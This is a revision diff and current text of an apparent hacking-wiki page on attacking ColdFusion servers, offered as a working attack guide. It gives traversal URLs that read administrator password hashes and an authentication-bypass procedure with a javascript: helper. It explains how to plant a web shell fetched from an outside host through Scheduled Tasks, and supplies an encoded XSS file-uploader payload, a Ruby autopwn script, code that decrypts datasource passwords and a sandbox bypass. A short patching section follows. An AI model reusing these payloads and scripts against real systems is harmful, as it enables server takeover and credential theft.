Difference between revisions of "Coldfusion hacking"
(→Injection) |
(oneliner didnt have an end quote) |
||
(42 intermediate revisions by 5 users not shown) | |||
Line 1: | Line 1: | ||
− | <b>C</b>old<b>F</b>usion <b>M</b>arkup Language is an [[interpreted languages|interpreted language]] utilizing a Java backend. It allows direct access to Java via its cfscript tags, while simultaneously offering a simple web wrapper. It is vulnerable to a variety of attacks, but mainly LFD and | + | <b>C</b>old<b>F</b>usion <b>M</b>arkup Language is an [[interpreted languages|interpreted language]] utilizing a Java backend. It allows direct access to Java via its cfscript tags, while simultaneously offering a simple web wrapper. It is vulnerable to a variety of attacks, but mainly Local File Disclosure (LFD) and [[SQL injection]]. ColdFusion scripts are commonly run as an elevated user, such as NT-Authority\SYSTEM (Windows) or root ([[Linux]]), making them especially susceptible to web-based attacks. |
==Injection== | ==Injection== | ||
− | + | ColdFusion script attacks are primarily platform-specific. The following examples outline vectors for attack. | |
− | + | ||
+ | Two platforms presently support ColdFusion Markup Language: | ||
+ | * Adobe ColdFusion | ||
+ | * Railo | ||
+ | |||
+ | ColdFusion scripts are officially recognized with two file extensions: | ||
+ | * cfm | ||
+ | * cfc | ||
+ | {{warning|This page includes a [[Zero-day]] [[XSS]] attack. Using these techniques against any system without authorization is a criminal act.}} | ||
===Adobe ColdFusion=== | ===Adobe ColdFusion=== | ||
− | |||
− | |||
− | The most critical ColdFusion vulnerability affects about a tenth of all ColdFusion servers at the present. It chains together multiple exploits, and it provides a 30 second window into the | + | Technique: LFD to ColdFusion Administrator [[authentication credentials|authentication]] bypass to remote command execution (complete compromise): |
+ | ====Remote File Disclosure of Password Hashes==== | ||
+ | The most critical ColdFusion vulnerability affects about a tenth of all ColdFusion servers at the present. It chains together multiple exploits, and it provides a 30 second window into the Administration panel. The ColdFusion Administration panel can then be used to write out a shell. | ||
− | You will need: Tamper Data (Firefox extension) | + | You will need: |
+ | * Tamper Data[https://addons.mozilla.org/en-US/firefox/addon/tamper-data/] (Firefox extension) | ||
− | To begin, the site in question must have an ColdFusion Administrator available. By default, it's mapped to CFIDE/administrator/enter.cfm. If it returns 500 Forbidden, switch to HTTPS. Alternatively, use the IP and not the hostname. Once at the ColdFusion administrator, verify it is either version 7 or 8. Then, supply the following injections [http://www.infointox.net/?p=59]: | + | To begin, the site in question must have an ColdFusion Administrator available. By default, it's mapped to CFIDE/administrator/enter.cfm. If it returns 500 Forbidden, switch to [[HTTPS]]. Alternatively, use the IP and not the hostname. Once at the ColdFusion administrator, verify it is either version 7 or 8. Then, supply the following injections [http://www.infointox.net/?p=59]: |
{|style="border-collapse: collapse; border-width: 1px; border-style: solid; border-color: #000" | {|style="border-collapse: collapse; border-width: 1px; border-style: solid; border-color: #000" | ||
Line 23: | Line 32: | ||
|style="border-style: solid; border-width: 1px"| ColdFusion 6 | |style="border-style: solid; border-width: 1px"| ColdFusion 6 | ||
|- | |- | ||
− | |style="border-style: solid; border-width: 1px"| http://site/CFIDE/administrator/ | + | |style="border-style: solid; border-width: 1px"| http://site/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX7\lib\password.properties%00en |
|style="border-style: solid; border-width: 1px"| ColdFusion 7 | |style="border-style: solid; border-width: 1px"| ColdFusion 7 | ||
|- | |- | ||
− | |style="border-style: solid; border-width: 1px"| http://site/CFIDE/administrator/ | + | |style="border-style: solid; border-width: 1px"| http://site/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\lib\password.properties%00en |
|style="border-style: solid; border-width: 1px"| ColdFusion 8 | |style="border-style: solid; border-width: 1px"| ColdFusion 8 | ||
|- | |- | ||
− | |style="border-style: solid; border-width: 1px"| http://site/CFIDE/administrator/ | + | |style="border-style: solid; border-width: 1px"| http://site/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en |
|style="border-style: solid; border-width: 1px"| All versions | |style="border-style: solid; border-width: 1px"| All versions | ||
|} | |} | ||
Line 37: | Line 46: | ||
====Issues==== | ====Issues==== | ||
* The page does not display properly (broken images)/I can't figure out what version it is | * The page does not display properly (broken images)/I can't figure out what version it is | ||
− | Try supplying the injections anyway. If the LFD succeeds but the images are broken, you will need to manually HMAC the administrator hash against the salt to bypass authentication. In an effort to simplify this, I've | + | Try supplying the injections anyway. If the LFD succeeds but the images are broken, you will need to manually HMAC the administrator hash against the salt to bypass authentication. In an effort to simplify this, I've supplied a one-liner command you can run to perform this: |
+ | <pre> | ||
python -c 'import hashlib,hmac; hash=raw_input("Hash > "); salt=raw_input("Salt > "); print "HMAC",hmac.new(salt,hash,hashlib.sha1).hexdigest().upper()' | python -c 'import hashlib,hmac; hash=raw_input("Hash > "); salt=raw_input("Salt > "); print "HMAC",hmac.new(salt,hash,hashlib.sha1).hexdigest().upper()' | ||
+ | </pre> | ||
The hash is provided via the LFD, and the salt is updated every 30 seconds in the source (ctrl+F salt, second one). | The hash is provided via the LFD, and the salt is updated every 30 seconds in the source (ctrl+F salt, second one). | ||
* None of the injections worked | * None of the injections worked | ||
There are a couple possible reasons behind this one. One, the files may not actually be there! Try including \boot.ini or /etc/hosts to find out if this is the case. If they include successfully, you may need to blindly locate the password.properties file (or another file of value). Two, the server may have l10n already patched. You'll need to find another vulnerability. | There are a couple possible reasons behind this one. One, the files may not actually be there! Try including \boot.ini or /etc/hosts to find out if this is the case. If they include successfully, you may need to blindly locate the password.properties file (or another file of value). Two, the server may have l10n already patched. You'll need to find another vulnerability. | ||
− | + | ||
+ | ====Logging In==== | ||
Now that the hash has been included, you may have been misled by other guides that you need to reverse it/hope its plaintext. This is NOT the case. Due to a second security advisory, you can bypass the authentication using the hash alone. Simpily paste the hash into the admin password form and run this via your address bar: | Now that the hash has been included, you may have been misled by other guides that you need to reverse it/hope its plaintext. This is NOT the case. Due to a second security advisory, you can bypass the authentication using the hash alone. Simpily paste the hash into the admin password form and run this via your address bar: | ||
+ | <pre> | ||
javascript:alert(hex_hmac_sha1(document.loginform.salt.value,document.loginform.cfadminPassword.value)) | javascript:alert(hex_hmac_sha1(document.loginform.salt.value,document.loginform.cfadminPassword.value)) | ||
+ | </pre> | ||
+ | |||
{{info|It's a good idea to bookmark this to cut down on time. NoScript users: make sure you are allowing scripts to run while performing this.}} | {{info|It's a good idea to bookmark this to cut down on time. NoScript users: make sure you are allowing scripts to run while performing this.}} | ||
− | |||
− | + | * You will get an alert with the HMACed hash. Copy this value. | |
+ | * Go to Tools -> Tamper Data and Start Tampering. | ||
+ | * Submit the login form, and paste the hash in the cfadminPassword field. | ||
+ | * Press <b>OK</b>. | ||
+ | '''If you were fast enough, you should be in the ColdFusion Administrator.''' | ||
+ | |||
+ | ====Writing Shell to File==== | ||
+ | * Go to the Settings Summary tab on the left and find the 'Mappings' section. | ||
+ | * One of the default mappings is /CFIDE. This is where you will be writing to. | ||
+ | * Copy the path next to it. | ||
+ | * Enter the Debugging and Logging tab on the left panel and click 'Scheduled Tasks' | ||
+ | * Click 'Schedule New Task'. | ||
+ | * Set the task name to whatever you like | ||
+ | * Change the URL to the URL of a plaintext CFM shell (http://example.site.tld/shells/cfm.txt) | ||
+ | * Check the option to save the output to a file. | ||
+ | * Paste the path you acquired from the Mappings into the 'File' field, | ||
+ | * Type the name you want to save the shell as and the extension (cfm). | ||
+ | * Press '''OK''' and click the green check to run the task. | ||
+ | |||
+ | '''If everything went as expected, your shell should now be on the server at /CFIDE/shellname.cfm.''' | ||
+ | * Delete the task. | ||
====Issues==== | ====Issues==== | ||
* It failed to get my shell | * It failed to get my shell | ||
− | Either /CFIDE is not writable (rare) or an outgoing firewall prevents you from retrieving a shell. It is possible to subvert the outgoing firewall by exploiting a localhost XSS in probe.cfm ( | + | Either /CFIDE is not writable (rare) or an outgoing firewall prevents you from retrieving a shell. It is possible to subvert the outgoing firewall by exploiting a localhost XSS in probe.cfm (supply it in the URL field of the scheduled task): |
− | URL | + | {{notice|We realize the URL below is horrifying. Trust it. It exploits a [[Zero-Day attack|zero day]] [[XSS]] attack in '''probe.cfm'''.}} |
− | /CFIDE/probe.cfm?name=%3Cb%3E%26%23181%3BSH%3C%2Fb%3E%22%3C%2Fh1%3E%3Ccfif%20isDefined(%22Form.File%22)%3E%3Ccftry%3E%3Ccffile%20action%3D%22upload%22%20destination%3D%22%23Expandpath(%22.%22)%23%22%20filefield%3D%22Form.File%22%20nameconflict%3D%22overwrite%22%3EFile%20uploaded!%3Ccfcatch%3EUpload%20failed%3C%2Fcfcatch%3E%3C%2Fcftry%3E%3C%2Fcfif%3E%3Cform%20method%3DPOST%20enctype%3D%22multipart%2Fform-data%22%3E%3Cinput%20type%3Dfile%20name%3D%22File%22%3E%3Cinput%20type%3Dsubmit%20value%3D%22Upload%22%3E%3C%2Fform%3E%3Cscript%3E | + | |
+ | <b>'''/CFIDE/probe.cfm?name=%3Cb%3E%26%23181%3BSH%3C%2Fb%3E%22%3C%2Fh1%3E%3Ccfif%20isDefined(%22Form.File%22)%3E%3Ccftry%3E%3Ccffile%20action%3D%22upload%22%20destination%3D%22%23Expandpath(%22.%22)%23%22%20filefield%3D%22Form.File%22%20nameconflict%3D%22overwrite%22%3EFile%20uploaded!%3Ccfcatch%3EUpload%20failed%3C%2Fcfcatch%3E%3C%2Fcftry%3E%3C%2Fcfif%3E%3Cform%20method%3DPOST%20enctype%3D%22multipart%2Fform-data%22%3E%3Cinput%20type%3Dfile%20name%3D%22File%22%3E%3Cinput%20type%3Dsubmit%20value%3D%22Upload%22%3E%3C%2Fform%3E%3Cscript%3E'''</b> | ||
A very small uploader will be written that uploads to the current path. | A very small uploader will be written that uploads to the current path. | ||
Line 67: | Line 102: | ||
---- | ---- | ||
Railo is commonly misconfigured to run as root. It also is the target of path disclosure. To accomplish this, go to a .cfm script that doesnt exist on the site, or error a .cfm script. Railo will give a verbose debug output disclosing potentially important information. | Railo is commonly misconfigured to run as root. It also is the target of path disclosure. To accomplish this, go to a .cfm script that doesnt exist on the site, or error a .cfm script. Railo will give a verbose debug output disclosing potentially important information. | ||
+ | |||
+ | |||
+ | === PoC: cf8_autopwn.rb === | ||
+ | ---- | ||
+ | :Special thanks to [[User:Savitri|Savitri]] for this script. | ||
+ | {{code|text=<source lang="ruby"> | ||
+ | #!/usr/bin/ruby | ||
+ | |||
+ | require 'net/http' | ||
+ | require 'net/https' | ||
+ | require 'openssl' | ||
+ | |||
+ | def usage | ||
+ | puts "usage: ./cf8_autopwn.rb host port" | ||
+ | end | ||
+ | |||
+ | if not ARGV.length == 2 | ||
+ | usage | ||
+ | exit(1) | ||
+ | end | ||
+ | |||
+ | server = ARGV[0] | ||
+ | port = ARGV[1].to_i | ||
+ | |||
+ | http = Net::HTTP.new(server, port) | ||
+ | if port == 443 then http.use_ssl = true end | ||
+ | |||
+ | # replace local with text file containing drtrv strings | ||
+ | # or ill stop being lazy and rewrite this to iterate through all options | ||
+ | # until we get a hit | ||
+ | path = '/CFIDE/administrator/enter.cfm' | ||
+ | locale = 'locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en' | ||
+ | headers = { | ||
+ | 'Host' => server, | ||
+ | 'Content-Type' => 'application/x-www-form-urlencoded', | ||
+ | 'Content-Length' => locale.length.to_s, | ||
+ | } | ||
+ | |||
+ | resp, data = http.post(path, locale, headers) | ||
+ | data =~ /\<title\>.*password=([A-F0-9]+).*\<\/title\>/m | ||
+ | password = $1 | ||
+ | data =~ /\<input name="salt" type="hidden" value="(\d+)"\>/ | ||
+ | |||
+ | salt = $1 | ||
+ | hash = OpenSSL::HMAC.hexdigest('sha1',salt, password) | ||
+ | |||
+ | logindata = "cfadminPassword=#{hash.upcase}&requestedURL=%2FCFIDE%2Fadministrator%2Fenter.cfm%3F" | ||
+ | logindata += "&salt=#{salt}&submit=Login" | ||
+ | loginheaders = { | ||
+ | 'Host' => server, | ||
+ | } | ||
+ | |||
+ | resp, data = http.post(path, logindata, loginheaders) | ||
+ | puts resp['set-cookie']</source>}} | ||
==Privilege Escalation== | ==Privilege Escalation== | ||
Line 75: | Line 164: | ||
2. Encrypted, base64ed ColdFusion hashes in 7+ can be reversed [http://hexale.blogspot.com/2008/07/how-to-decrypt-coldfusion-datasource.html]. They can be found in the source of the datasource pages in the Administrator and in xml files in lib/. To decrypt them, run this in a ColdFusion environment: | 2. Encrypted, base64ed ColdFusion hashes in 7+ can be reversed [http://hexale.blogspot.com/2008/07/how-to-decrypt-coldfusion-datasource.html]. They can be found in the source of the datasource pages in the Administrator and in xml files in lib/. To decrypt them, run this in a ColdFusion environment: | ||
− | <syntaxhighlight lang="java"> | + | {{code|text =<syntaxhighlight lang="java"> |
<cfscript> | <cfscript> | ||
o=createobject("java","coldfusion.server.ServiceFactory").getDatasourceService().getDatasources(); | o=createobject("java","coldfusion.server.ServiceFactory").getDatasourceService().getDatasources(); | ||
Line 85: | Line 174: | ||
} | } | ||
</cfscript> | </cfscript> | ||
− | </syntaxhighlight> | + | </syntaxhighlight>}} |
− | 3. Sandbox security for cfexecute can be bypassed. Use createObject("java","java.lang.ProcessBuilder").init(cmd).start() within cfscript tags ( | + | 3. Sandbox security for cfexecute can be bypassed. Use <pre>createObject("java","java.lang.ProcessBuilder").init(cmd).start()</pre> within cfscript tags ('''[[Zero-Day attack]] 2'''). |
+ | |||
+ | ==Patching== | ||
+ | Patching a ColdFusion instance from the LFD->Bypass->RCE exploit can <ins>only</ins> be done on ColdFusion 8. No other versions can be patched. That being said, the official Adobe patch can be downloaded here: | ||
+ | |||
+ | http://kb2.adobe.com/cps/857/cpsid_85766.html | ||
+ | |||
+ | Extract the .zip file and replace the two affected files (l10n.cfm & l10n_testing.cfm). Restart the ColdFusion Application Server service to apply the patch. Alternatively, run the following code in a ColdFusion environment: | ||
+ | |||
+ | {{code|text =<syntaxhighlight lang="java"> | ||
+ | <cfscript> | ||
+ | oJRun = CreateObject("java","jrunx.kernel.JRun"); | ||
+ | oJRun.restart(oJRun.getServerName()); | ||
+ | </cfscript> | ||
+ | </syntaxhighlight>}}{{protip|You can verify the host is patched by testing various LFD injections against /CFIDE/administrator/enter.cfm.}} | ||
==Resources== | ==Resources== | ||
− | http://www.infointox.net/?p=59 | + | * http://www.infointox.net/?p=59 |
− | http://hexale.blogspot.com/2008/07/how-to-decrypt-coldfusion-datasource.html | + | |
− | http://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861/ | + | * http://hexale.blogspot.com/2008/07/how-to-decrypt-coldfusion-datasource.html |
+ | |||
+ | * http://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861/ | ||
+ | |||
+ | * http://www.securiteam.com/tools/5ZP0B00FPG.html - Barebones Cfm Shell ('''Detected by anti-virus.''') | ||
− | + | {{exploitation}} | |
+ | {{social}} |
Latest revision as of 00:00, 8 October 2012
ColdFusion Markup Language is an interpreted language utilizing a Java backend. It allows direct access to Java via its cfscript tags, while simultaneously offering a simple web wrapper. It is vulnerable to a variety of attacks, but mainly Local File Disclosure (LFD) and SQL injection. ColdFusion scripts are commonly run as an elevated user, such as NT-Authority\SYSTEM (Windows) or root (Linux), making them especially susceptible to web-based attacks.
Contents
Injection
ColdFusion script attacks are primarily platform-specific. The following examples outline vectors for attack.
Two platforms presently support ColdFusion Markup Language:
- Adobe ColdFusion
- Railo
ColdFusion scripts are officially recognized with two file extensions:
- cfm
- cfc
This page includes a Zero-day XSS attack. Using these techniques against any system without authorization is a criminal act. |
Adobe ColdFusion
Technique: LFD to ColdFusion Administrator authentication bypass to remote command execution (complete compromise):
Remote File Disclosure of Password Hashes
The most critical ColdFusion vulnerability affects about a tenth of all ColdFusion servers at the present. It chains together multiple exploits, and it provides a 30 second window into the Administration panel. The ColdFusion Administration panel can then be used to write out a shell.
You will need:
- Tamper Data[1] (Firefox extension)
To begin, the site in question must have an ColdFusion Administrator available. By default, it's mapped to CFIDE/administrator/enter.cfm. If it returns 500 Forbidden, switch to HTTPS. Alternatively, use the IP and not the hostname. Once at the ColdFusion administrator, verify it is either version 7 or 8. Then, supply the following injections [2]:
If the LFD succeeds, the ColdFusion Administrator hash will be included on the page.
Issues
- The page does not display properly (broken images)/I can't figure out what version it is
Try supplying the injections anyway. If the LFD succeeds but the images are broken, you will need to manually HMAC the administrator hash against the salt to bypass authentication. In an effort to simplify this, I've supplied a one-liner command you can run to perform this:
python -c 'import hashlib,hmac; hash=raw_input("Hash > "); salt=raw_input("Salt > "); print "HMAC",hmac.new(salt,hash,hashlib.sha1).hexdigest().upper()'
The hash is provided via the LFD, and the salt is updated every 30 seconds in the source (ctrl+F salt, second one).
- None of the injections worked
There are a couple possible reasons behind this one. One, the files may not actually be there! Try including \boot.ini or /etc/hosts to find out if this is the case. If they include successfully, you may need to blindly locate the password.properties file (or another file of value). Two, the server may have l10n already patched. You'll need to find another vulnerability.
Logging In
Now that the hash has been included, you may have been misled by other guides that you need to reverse it/hope its plaintext. This is NOT the case. Due to a second security advisory, you can bypass the authentication using the hash alone. Simpily paste the hash into the admin password form and run this via your address bar:
javascript:alert(hex_hmac_sha1(document.loginform.salt.value,document.loginform.cfadminPassword.value))
It's a good idea to bookmark this to cut down on time. NoScript users: make sure you are allowing scripts to run while performing this. |
- You will get an alert with the HMACed hash. Copy this value.
- Go to Tools -> Tamper Data and Start Tampering.
- Submit the login form, and paste the hash in the cfadminPassword field.
- Press OK.
If you were fast enough, you should be in the ColdFusion Administrator.
Writing Shell to File
- Go to the Settings Summary tab on the left and find the 'Mappings' section.
- One of the default mappings is /CFIDE. This is where you will be writing to.
- Copy the path next to it.
- Enter the Debugging and Logging tab on the left panel and click 'Scheduled Tasks'
- Click 'Schedule New Task'.
- Set the task name to whatever you like
- Change the URL to the URL of a plaintext CFM shell (http://example.site.tld/shells/cfm.txt)
- Check the option to save the output to a file.
- Paste the path you acquired from the Mappings into the 'File' field,
- Type the name you want to save the shell as and the extension (cfm).
- Press OK and click the green check to run the task.
If everything went as expected, your shell should now be on the server at /CFIDE/shellname.cfm.
- Delete the task.
Issues
- It failed to get my shell
Either /CFIDE is not writable (rare) or an outgoing firewall prevents you from retrieving a shell. It is possible to subvert the outgoing firewall by exploiting a localhost XSS in probe.cfm (supply it in the URL field of the scheduled task):
/CFIDE/probe.cfm?name=%3Cb%3E%26%23181%3BSH%3C%2Fb%3E%22%3C%2Fh1%3E%3Ccfif%20isDefined(%22Form.File%22)%3E%3Ccftry%3E%3Ccffile%20action%3D%22upload%22%20destination%3D%22%23Expandpath(%22.%22)%23%22%20filefield%3D%22Form.File%22%20nameconflict%3D%22overwrite%22%3EFile%20uploaded!%3Ccfcatch%3EUpload%20failed%3C%2Fcfcatch%3E%3C%2Fcftry%3E%3C%2Fcfif%3E%3Cform%20method%3DPOST%20enctype%3D%22multipart%2Fform-data%22%3E%3Cinput%20type%3Dfile%20name%3D%22File%22%3E%3Cinput%20type%3Dsubmit%20value%3D%22Upload%22%3E%3C%2Fform%3E%3Cscript%3E
A very small uploader will be written that uploads to the current path.
Railo
Railo is commonly misconfigured to run as root. It also is the target of path disclosure. To accomplish this, go to a .cfm script that doesnt exist on the site, or error a .cfm script. Railo will give a verbose debug output disclosing potentially important information.
PoC: cf8_autopwn.rb
- Special thanks to Savitri for this script.
#!/usr/bin/ruby require 'net/http' require 'net/https' require 'openssl' def usage puts "usage: ./cf8_autopwn.rb host port" end if not ARGV.length == 2 usage exit(1) end server = ARGV[0] port = ARGV[1].to_i http = Net::HTTP.new(server, port) if port == 443 then http.use_ssl = true end # replace local with text file containing drtrv strings # or ill stop being lazy and rewrite this to iterate through all options # until we get a hit path = '/CFIDE/administrator/enter.cfm' locale = 'locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en' headers = { 'Host' => server, 'Content-Type' => 'application/x-www-form-urlencoded', 'Content-Length' => locale.length.to_s, } resp, data = http.post(path, locale, headers) data =~ /\<title\>.*password=([A-F0-9]+).*\<\/title\>/m password = $1 data =~ /\<input name="salt" type="hidden" value="(\d+)"\>/ salt = $1 hash = OpenSSL::HMAC.hexdigest('sha1',salt, password) logindata = "cfadminPassword=#{hash.upcase}&requestedURL=%2FCFIDE%2Fadministrator%2Fenter.cfm%3F" logindata += "&salt=#{salt}&submit=Login" loginheaders = { 'Host' => server, } resp, data = http.post(path, logindata, loginheaders) puts resp['set-cookie'] |
Privilege Escalation
Three techniques can be employed to escalate privileges:
1. ColdFusion 9 (latest) is still vulnerable to the same admin bypass. If you have the hash, the CF 7/8 technique can be applied.
2. Encrypted, base64ed ColdFusion hashes in 7+ can be reversed [3]. They can be found in the source of the datasource pages in the Administrator and in xml files in lib/. To decrypt them, run this in a ColdFusion environment:
<syntaxhighlight lang="java"> <cfscript> o=createobject("java","coldfusion.server.ServiceFactory").getDatasourceService().getDatasources(); for(i in o) { if(len(o[i]["password"])){ dp=Decrypt(o[i]["password"], generate3DesKey("0yJ!@1$r8p0L@r1$6yJ!@1rj"), "DESede", "Base64") ; writeoutput("#htmleditformat(i)# : #htmleditformat(dp)##chr(10)#"); } } </cfscript> </syntaxhighlight> |
createObject("java","java.lang.ProcessBuilder").init(cmd).start()within cfscript tags (Zero-Day attack 2).
Patching
Patching a ColdFusion instance from the LFD->Bypass->RCE exploit can only be done on ColdFusion 8. No other versions can be patched. That being said, the official Adobe patch can be downloaded here:
http://kb2.adobe.com/cps/857/cpsid_85766.html
Extract the .zip file and replace the two affected files (l10n.cfm & l10n_testing.cfm). Restart the ColdFusion Application Server service to apply the patch. Alternatively, run the following code in a ColdFusion environment:
<syntaxhighlight lang="java"> <cfscript> oJRun = CreateObject("java","jrunx.kernel.JRun"); oJRun.restart(oJRun.getServerName()); </cfscript> </syntaxhighlight> |
Resources
- http://www.securiteam.com/tools/5ZP0B00FPG.html - Barebones Cfm Shell (Detected by anti-virus.)